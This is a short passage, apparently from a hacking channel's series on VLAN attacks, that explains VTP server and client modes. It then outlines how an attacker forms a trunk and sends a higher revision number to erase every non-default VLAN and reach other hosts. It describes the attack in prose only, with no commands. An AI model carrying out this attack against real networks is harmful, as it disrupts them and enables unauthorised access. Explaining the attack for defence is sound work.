The VLAN Trunking Protocol (VTP) is a management protocol that reduces the amount of configuration in a switched environment. As far as VTP is concerned, a switch can be a VTP server, a VTP client or VTP transparent. Here we focus on the VTP server and the VTP client. Every time a user changes the configuration of a switch working in VTP server mode, whether a VLAN is added, modified or removed, the VTP configuration revision number increases by 1. When a VTP client sees a configuration revision number greater than its own, it automatically synchronizes with the VTP server.

10) A malicious hacker can use VTP for his own purposes and remove all VLANs on the network (except the default VLAN), so that he ends up in the same VLAN as every other user. The users may still be on different IP subnets, however, so the hacker must change his IP address to get onto the same subnet as the host he wants to attack.

The hacker exploits VTP by connecting to the switch and establishing a trunk between his computer and the switch. He then sends the VTP server a VTP message whose configuration revision number is higher than the current one. This causes all switches to synchronize with the hacker's computer, removing all non-default VLANs from the VLAN database.

▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁
🦑 Comprehensive analysis of VLAN attacks, full